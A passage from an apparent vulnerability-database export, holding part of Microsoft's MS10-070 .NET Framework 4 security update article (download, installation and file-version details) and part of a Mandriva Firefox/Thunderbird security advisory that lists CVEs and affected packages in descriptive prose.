class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2425938\" id=\"kb-link-9\">2425938 </a> How to configure legacy encryption mode in ASP.NET </div><h3 class=\"sbody-h3\">Download Information</h3><span>The following file is available for download from the Microsoft Download Center:<br/></span><br/><br/><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://go.microsoft.com/fwlink/?linkid=202406\" id=\"kb-link-10\" target=\"_self\">Download the package now.</a></span><br/><br/><span>Release Date: September 28, 2010<br/><br/>For more information about how to download Microsoft support files, click the following article number to view the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/119591\" id=\"kb-link-11\">119591 </a> How to obtain Microsoft support files from online services<br/></div>Microsoft scanned this file for viruses. Microsoft used the most current virus-detection software that was available on the date that the file was posted. The file is stored on security-enhanced servers that help prevent any unauthorized changes to the file.<br/></span><h3 class=\"sbody-h3\">Prerequisites</h3>To install this update, you must have Windows Installer 3.1 or a later version installed on the computer. To obtain the latest version of Windows Installer, visit the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://go.microsoft.com/fwlink/?linkid=132022\" id=\"kb-link-12\" target=\"_self\">Windows Installer 4.5 Redistributable</a></div><h3 class=\"sbody-h3\">Known issues and additional information about this security update</h3>For more information about installation issues this security update or with the Microsoft .NET Framework Service Pack 1, click the following article number to view the article in the Microsoft Knowledge Base:<br/><br/><br/><br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2431728\" id=\"kb-link-13\">2431728 </a> Encrypted content in ASP.NET is not decrypted for a website that is deployed in a web farm<br/><a href=\"https://support.microsoft.com/en-us/help/2431208\" id=\"kb-link-14\">2431208 </a> An update for the Microsoft .NET Framework may fail to install when the Microsoft .NET Framework 4 is installed and a restart is pending<br/><a href=\"https://support.microsoft.com/en-us/help/2260913\" id=\"kb-link-15\">2260913 </a> Files in use or File Locks can Result in Framework Assembly Files being Deleted <br/><a href=\"https://support.microsoft.com/en-us/help/2263996\" id=\"kb-link-16\">2263996 </a> Patching of Microsoft Framework can fail with Access is denied or File in Use error<br/><a href=\"https://support.microsoft.com/en-us/help/2473228\" id=\"kb-link-17\">2473228 </a> Products or updates may not be installed correctly when Microsoft .NET Framework 4 or updates for Microsoft .NET Framework 4 are installed after the other product or update installs and a restart is pending <br/><br/></div><span class=\"text-base\">Note</span> The installer for the update that corresponds to Knowledge Base article 2416472 does not have a localized link for the Data Collection Policy. This information can be found in the following websites. Select the link that is appropriate for your language:<div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Language</th><th class=\"sbody-th\">Privacy Statement for the Microsoft Customer Experience Improvement Program</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Arabic</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/ar-sa/privacypolicy.mspx\" id=\"kb-link-18\" target=\"_self\">http://www.microsoft.com/products/ceip/ar-SA/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Chinese - China</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/zh-cn/privacypolicy.mspx\" id=\"kb-link-19\" target=\"_self\">http://www.microsoft.com/products/ceip/zh-CN/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Chinese - Taiwan</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/zh-tw/privacypolicy.mspx\" id=\"kb-link-20\" target=\"_self\">http://www.microsoft.com/products/ceip/zh-TW/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Czech</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/cs-cz/privacypolicy.mspx\" id=\"kb-link-21\" target=\"_self\">http://www.microsoft.com/products/ceip/cs-CZ/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Danish</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/da-dk/privacypolicy.mspx\" id=\"kb-link-22\" target=\"_self\">http://www.microsoft.com/products/ceip/da-DK/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dutch</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/nl-nl/privacypolicy.mspx\" id=\"kb-link-23\" target=\"_self\">http://www.microsoft.com/products/ceip/nl-NL/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">English</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/en-us/privacypolicy.mspx\" id=\"kb-link-24\" target=\"_self\">http://www.microsoft.com/products/ceip/en-US/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Finnish</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/fi-fi/privacypolicy.mspx\" id=\"kb-link-25\" target=\"_self\">http://www.microsoft.com/products/ceip/fi-FI/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">French</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/fr-fr/privacypolicy.mspx\" id=\"kb-link-26\" target=\"_self\">http://www.microsoft.com/products/ceip/fr-FR/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">German</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/de-de/privacypolicy.mspx\" id=\"kb-link-27\" target=\"_self\">http://www.microsoft.com/products/ceip/de-DE/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Greek</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/el-gr/privacypolicy.mspx\" id=\"kb-link-28\" target=\"_self\">http://www.microsoft.com/products/ceip/el-GR/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Hebrew</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/he-il/privacypolicy.mspx\" id=\"kb-link-29\" target=\"_self\">http://www.microsoft.com/products/ceip/he-IL/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Hungarian</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/hu-hu/privacypolicy.mspx\" id=\"kb-link-30\" target=\"_self\">http://www.microsoft.com/products/ceip/hu-HU/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Italian</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/it-it/privacypolicy.mspx\" id=\"kb-link-31\" target=\"_self\">http://www.microsoft.com/products/ceip/it-IT/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Japanese</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/ja-jp/privacypolicy.mspx\" id=\"kb-link-32\" target=\"_self\">http://www.microsoft.com/products/ceip/ja-JP/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Korean</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/ko-kr/privacypolicy.mspx\" id=\"kb-link-33\" target=\"_self\">http://www.microsoft.com/products/ceip/ko-KR/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Norwegian</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/nb-no/privacypolicy.mspx\" id=\"kb-link-34\" target=\"_self\">http://www.microsoft.com/products/ceip/nb-NO/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Polish</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/pl-pl/privacypolicy.mspx\" id=\"kb-link-35\" target=\"_self\">http://www.microsoft.com/products/ceip/pl-PL/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Portuguese - Brazil</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/pt-br/privacypolicy.mspx\" id=\"kb-link-36\" target=\"_self\">http://www.microsoft.com/products/ceip/pt-BR/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Portuguese - Portugal</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/pt-pt/privacypolicy.mspx\" id=\"kb-link-37\" target=\"_self\">http://www.microsoft.com/products/ceip/pt-PT/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Russian</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/ru-ru/privacypolicy.mspx\" id=\"kb-link-38\" target=\"_self\">http://www.microsoft.com/products/ceip/ru-RU/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Spanish</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/es-es/privacypolicy.mspx\" id=\"kb-link-39\" target=\"_self\">http://www.microsoft.com/products/ceip/es-ES/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Swedish</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/sv-se/privacypolicy.mspx\" id=\"kb-link-40\" target=\"_self\">http://www.microsoft.com/products/ceip/sv-SE/privacypolicy.mspx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Turkish</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/products/ceip/tr-tr/privacypolicy.mspx\" id=\"kb-link-41\" target=\"_self\">http://www.microsoft.com/products/ceip/tr-TR/privacypolicy.mspx</a></td></tr></table></div><h3 class=\"sbody-h3\">Command-line switches for this update</h3>For information about the various command-line switches that are supported by this update, see the <a href=\"https://support.microsoft.com/help/227091\" id=\"kb-link-42\" target=\"_self\">Windows Installer command-line switches</a> document.<br/><br/>For more information about Windows Installer, visit the <a href=\"http://msdn.microsoft.com/en-us/library/windows/desktop/cc185688(v=vs.85).aspx\" id=\"kb-link-43\" target=\"_self\">Windows Installer MSDN website</a>.<h3 class=\"sbody-h3\">Restart requirement</h3>You do not have to restart the system after you install this security update unless files that are being updated are locked or in use. However, this security update will cause all Internet Information Services (IIS)-related services to restart. These include the IISADMIN, W3SVC, FTP, and SMTP services. This behavior occurs because a base component for the .NET Framework includes instructions to restart these services. Therefore, every update to the product will execute the same instructions to restart these services. <h3 class=\"sbody-h3\">Update removal information</h3>To remove this security update, use the <strong class=\"uiterm\">Add or Remove Programs</strong> item in Control Panel.<br/><h3 class=\"sbody-h3\">Update replacement information</h3>This security update does not replace a previously released security update.<br/></div><h2>FILE INFORMATION</h2><div class=\"kb-summary-section section\"><a class=\"bookmark\" id=\"fileinfo\"></a>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time and with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.<br/><h4 class=\"sbody-h4\">For x86-based systems</h4><span class=\"text-base\">GDR files</span><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">System.Web.Extensions.dll</td><td class=\"sbody-td\">4.0.30319.206</td><td class=\"sbody-td\">1,836,904</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:54</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">System.Web.dll</td><td class=\"sbody-td\">4.0.30319.206</td><td class=\"sbody-td\">5,176,144</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:55</td></tr></table></div><span class=\"text-base\">LDR files</span><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Setup.exe</td><td class=\"sbody-td\">10.0.30319.363</td><td class=\"sbody-td\">78,152</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:45</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">SetupEngine.dll</td><td class=\"sbody-td\">10.0.30319.363</td><td class=\"sbody-td\">809,304</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:45</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">SetupUi.dll</td><td class=\"sbody-td\">10.0.30319.363</td><td class=\"sbody-td\">295,248</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:45</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">System.Web.Extensions.dll</td><td class=\"sbody-td\">4.0.30319.363</td><td class=\"sbody-td\">1,836,904</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">System.Web.dll</td><td class=\"sbody-td\">4.0.30319.363</td><td class=\"sbody-td\">5,176,144</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:47</td></tr></table></div><h4 class=\"sbody-h4\">For x64-based systems</h4><span class=\"text-base\">GDR files</span><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">System.Web.Extensions.dll</td><td class=\"sbody-td\">4.0.30319.206</td><td class=\"sbody-td\">1,836,904</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:54</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">System.Web.dll</td><td class=\"sbody-td\">4.0.30319.206</td><td class=\"sbody-td\">5,146,960</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">13:21</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">System.Web.dll</td><td class=\"sbody-td\">4.0.30319.206</td><td class=\"sbody-td\">5,176,144</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:55</td></tr></table></div><span class=\"text-base\">LDR files</span><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Setup.exe</td><td class=\"sbody-td\">10.0.30319.363</td><td class=\"sbody-td\">78,152</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:45</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">SetupEngine.dll</td><td class=\"sbody-td\">10.0.30319.363</td><td class=\"sbody-td\">809,304</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:45</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">SetupUi.dll</td><td class=\"sbody-td\">10.0.30319.363</td><td class=\"sbody-td\">295,248</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:45</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">System.Web.Extensions.dll</td><td class=\"sbody-td\">4.0.30319.363</td><td class=\"sbody-td\">1,836,904</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">System.Web.dll</td><td class=\"sbody-td\">4.0.30319.363</td><td class=\"sbody-td\">5,146,960</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">13:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">System.Web.dll</td><td class=\"sbody-td\">4.0.30319.363</td><td class=\"sbody-td\">5,176,144</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:47</td></tr></table></div><h4 class=\"sbody-h4\">For IA-64-based systems</h4><span class=\"text-base\">GDR files</span><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">System.Web.Extensions.dll</td><td class=\"sbody-td\">4.0.30319.206</td><td class=\"sbody-td\">1,836,904</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:54</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">System.Web.dll</td><td class=\"sbody-td\">4.0.30319.206</td><td class=\"sbody-td\">4,759,376</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">13:48</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">System.Web.dll</td><td class=\"sbody-td\">4.0.30319.206</td><td class=\"sbody-td\">5,176,144</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:55</td></tr></table></div><span class=\"text-base\">LDR files</span><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Setup.exe</td><td class=\"sbody-td\">10.0.30319.363</td><td class=\"sbody-td\">78,152</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:45</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">SetupEngine.dll</td><td class=\"sbody-td\">10.0.30319.363</td><td class=\"sbody-td\">809,304</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:45</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">SetupUi.dll</td><td class=\"sbody-td\">10.0.30319.363</td><td class=\"sbody-td\">295,248</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:45</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">System.Web.Extensions.dll</td><td class=\"sbody-td\">4.0.30319.363</td><td class=\"sbody-td\">1,836,904</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">System.Web.dll</td><td class=\"sbody-td\">4.0.30319.363</td><td class=\"sbody-td\">4,759,376</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">13:32</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">System.Web.dll</td><td class=\"sbody-td\">4.0.30319.363</td><td class=\"sbody-td\">5,176,144</td><td class=\"sbody-td\">22-Sep-2010</td><td class=\"sbody-td\">12:47</td></tr></table></div></div></body></html>", "edition": 2, "modified": "2012-06-18T05:49:51", "id": "KB2416472", "href": "https://support.microsoft.com/en-us/help/2416472/", "published": "2012-06-18T05:49:51", "title": "MS10-070: Description of the security update for the Microsoft .NET Framework 4 on Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2", "type": "mskb", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2021-01-07T11:53:39", "description": "Security issues were identified and fixed in mozilla firefox and\nthunderbird :\n\nMozilla developers identified and fixed several memory safety bugs in\nthe browser engine used in Firefox and other Mozilla-based products.\nSome of these bugs showed evidence of memory corruption under certain\ncircumstances, and we presume that with enough effort at least some of\nthese could be exploited to run arbitrary code (CVE-2012-0468,\nCVE-2012-0467).\n\nUsing the Address Sanitizer tool, security researcher Aki Helin from\nOUSPG found that IDBKeyRange of indexedDB remains in the XPConnect\nhashtable instead of being unlinked before being destroyed. When it is\ndestroyed, this causes a use-after-free, which is potentially\nexploitable (CVE-2012-0469).\n\nUsing the Address Sanitizer tool, security researcher Atte Kettunen\nfrom OUSPG found a heap corruption in gfxImageSurface which allows for\ninvalid frees and possible remote code execution. This happens due to\nfloat error, resulting from graphics values being passed through\ndifferent number systems (CVE-2012-0470).\n\nAnne van Kesteren of Opera Software found a multi-octet encoding issue\nwhere certain octets will destroy the following octets in the\nprocessing of some multibyte character sets. This can leave users\nvulnerable to cross-site scripting (XSS) attacks on maliciously\ncrafted web pages (CVE-2012-0471).\n\nSecurity research firm iDefense reported that researcher wushi of\nteam509 discovered a memory corruption on Windows Vista and Windows 7\nsystems with hardware acceleration disabled or using incompatible\nvideo drivers. This is created by using cairo-dwrite to attempt to\nrender fonts on an unsupported code path. This corruption causes a\npotentially exploitable crash on affected systems (CVE-2012-0472).\n\nMozilla community member Matias Juntunen discovered an error in\nWebGLBuffer where FindMaxElementInSubArray receives wrong template\narguments from FindMaxUshortElement. This bug causes maximum index to\nbe computed incorrectly within WebGL.drawElements, allowing the\nreading of illegal video memory (CVE-2012-0473).\n\nSecurity researchers Jordi Chancel and Eddy Bordi reported that they\ncould short-circuit page loads to show the address of a different site\nthan what is loaded in the window in the addressbar. Security\nresearcher Chris McGowen independently reported the same flaw, and\nfurther demonstrated that this could lead to loading scripts from the\nattacker's site, leaving users vulnerable to cross-site scripting\n(XSS) attacks (CVE-2012-0474).\n\nSecurity researcher Masato Kinugawa found that during the decoding of\nISO-2022-KR and ISO-2022-CN character sets, characters near 1024 bytes\nare treated incorrectly, either doubling or deleting bytes. On certain\npages it might be possible for an attacker to pad the output of the\npage such that these errors fall in the right place to affect the\nstructure of the page, allowing for cross-site script (XSS) injection\n(CVE-2012-0477).\n\nMozilla community member Ms2ger found an image rendering issue with\nWebGL when texImage2D uses use JSVAL_TO_OBJECT on arbitrary objects.\nThis can lead to a crash on a maliciously crafted web page. While\nthere is no evidence that this is directly exploitable, there is a\npossibility of remote code execution (CVE-2012-0478).\n\nMateusz Jurczyk of the Google Security Team discovered an off-by-one\nerror in the OpenType Sanitizer using the Address Sanitizer tool. This\ncan lead to an out-of-bounds read and execution of an uninitialized\nfunction pointer during parsing and possible remote code execution\n(CVE-2011-3062).\n\nSecurity researcher Jeroen van der Gun reported that if RSS or Atom\nXML invalid content is loaded over HTTPS, the addressbar updates to\ndisplay the new location of the loaded resource, including SSL\nindicators, while the main window still displays the previously loaded\ncontent. This allows for phishing attacks where a malicious page can\nspoof the identify of another seemingly secure site (CVE-2012-0479).\n\nThe mozilla firefox and thunderbird packages has been upgraded to the\nlatest respective versions which is unaffected by these security\nflaws.\n\nAdditionally the SQLite packages has been upgraded to the 3.7.11\nversion and the cairo packages has been patched to work with firefox\nand thunderbird 12.0 for Mandriva Linux 2011.", "edition": 26, "published": "2012-04-30T00:00:00", "title": "Mandriva Linux Security Advisory : mozilla (MDVSA-2012:066)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0478", "CVE-2012-0479", "CVE-2012-0470", "CVE-2012-0472", "CVE-2012-0469", "CVE-2012-0474", "CVE-2012-0468", "CVE-2011-3062", "CVE-2012-0477", "CVE-2012-0473", "CVE-2012-0467", "CVE-2012-0471"], "modified": "2012-04-30T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:firefox-br", "p-cpe:/a:mandriva:linux:firefox-en_ZA", "p-cpe:/a:mandriva:linux:firefox-zh_CN", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-bn_BD", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-tr", "p-cpe:/a:mandriva:linux:firefox-gd", "p-cpe:/a:mandriva:linux:libxulrunner-devel", "cpe:/o:mandriva:linux:2011", "p-cpe:/a:mandriva:linux:libxulrunner10.0.4", "p-cpe:/a:mandriva:linux:firefox-sv_SE", "p-cpe:/a:mandriva:linux:libsqlite3_0", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-el", "p-cpe:/a:mandriva:linux:firefox-fa", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-sv_SE", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-nl", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-da", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-lt", "p-cpe:/a:mandriva:linux:firefox-sk", "p-cpe:/a:mandriva:linux:sqlite3-tools", "p-cpe:/a:mandriva:linux:nsinstall", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-vi", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-sl", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-id", "p-cpe:/a:mandriva:linux:firefox-eu", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pt", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ru", "p-cpe:/a:mandriva:linux:firefox-de", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-es_ES", "p-cpe:/a:mandriva:linux:firefox-id", "p-cpe:/a:mandriva:linux:firefox", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-zh_TW", "p-cpe:/a:mandriva:linux:libxulrunner12.0", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ja", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ta_LK", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-pt_BR", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-de", "p-cpe:/a:mandriva:linux:firefox-sl", "p-cpe:/a:mandriva:linux:firefox-es_ES", "p-cpe:/a:mandriva:linux:firefox-ta", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-el", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-br", "p-cpe:/a:mandriva:linux:firefox-el", "p-cpe:/a:mandriva:linux:lib64xulrunner-devel", "p-cpe:/a:mandriva:linux:xulrunner", "p-cpe:/a:mandriva:linux:firefox-bn_BD", "p-cpe:/a:mandriva:linux:firefox-nso", "p-cpe:/a:mandriva:linux:firefox-gl", "p-cpe:/a:mandriva:linux:firefox-fi", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-fy", "p-cpe:/a:mandriva:linux:firefox-be", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-sl", "p-cpe:/a:mandriva:linux:firefox-af", "p-cpe:/a:mandriva:linux:firefox-ja", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-pl", "p-cpe:/a:mandriva:linux:firefox-ku", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ar", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-sv", "p-cpe:/a:mandriva:linux:firefox-is", "p-cpe:/a:mandriva:linux:firefox-lv", "p-cpe:/a:mandriva:linux:firefox-pa_IN", "p-cpe:/a:mandriva:linux:firefox-vi", "p-cpe:/a:mandriva:linux:firefox-tr", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-it", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-eu", "p-cpe:/a:mandriva:linux:firefox-ga_IE", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ga", "p-cpe:/a:mandriva:linux:firefox-nl", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-gd", "p-cpe:/a:mandriva:linux:lib64sqlite3_0", "p-cpe:/a:mandriva:linux:firefox-lt", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-bg", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ca", "p-cpe:/a:mandriva:linux:firefox-ro", "p-cpe:/a:mandriva:linux:firefox-bn_IN", "p-cpe:/a:mandriva:linux:firefox-it", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-nb", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-sq", "p-cpe:/a:mandriva:linux:firefox-fy", "p-cpe:/a:mandriva:linux:firefox-es_AR", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-cs", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-zh_CN", "p-cpe:/a:mandriva:linux:firefox-sq", "p-cpe:/a:mandriva:linux:firefox-ru", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ko", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-fr", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ru", "p-cpe:/a:mandriva:linux:firefox-zu", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-fi", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-en_GB", "p-cpe:/a:mandriva:linux:firefox-fr", "p-cpe:/a:mandriva:linux:firefox-zh_TW", "p-cpe:/a:mandriva:linux:firefox-bs", "p-cpe:/a:mandriva:linux:lib64sqlite3-devel", "p-cpe:/a:mandriva:linux:firefox-kk", "p-cpe:/a:mandriva:linux:lib64cairo-static-devel", "p-cpe:/a:mandriva:linux:firefox-te", "cpe:/o:mandriva:linux:2010.1", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-fi", "p-cpe:/a:mandriva:linux:firefox-eo", "p-cpe:/a:mandriva:linux:lib64cairo2", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-es", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-pt_PT", "p-cpe:/a:mandriva:linux:firefox-mk", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-es_AR", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-gl", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-tr", 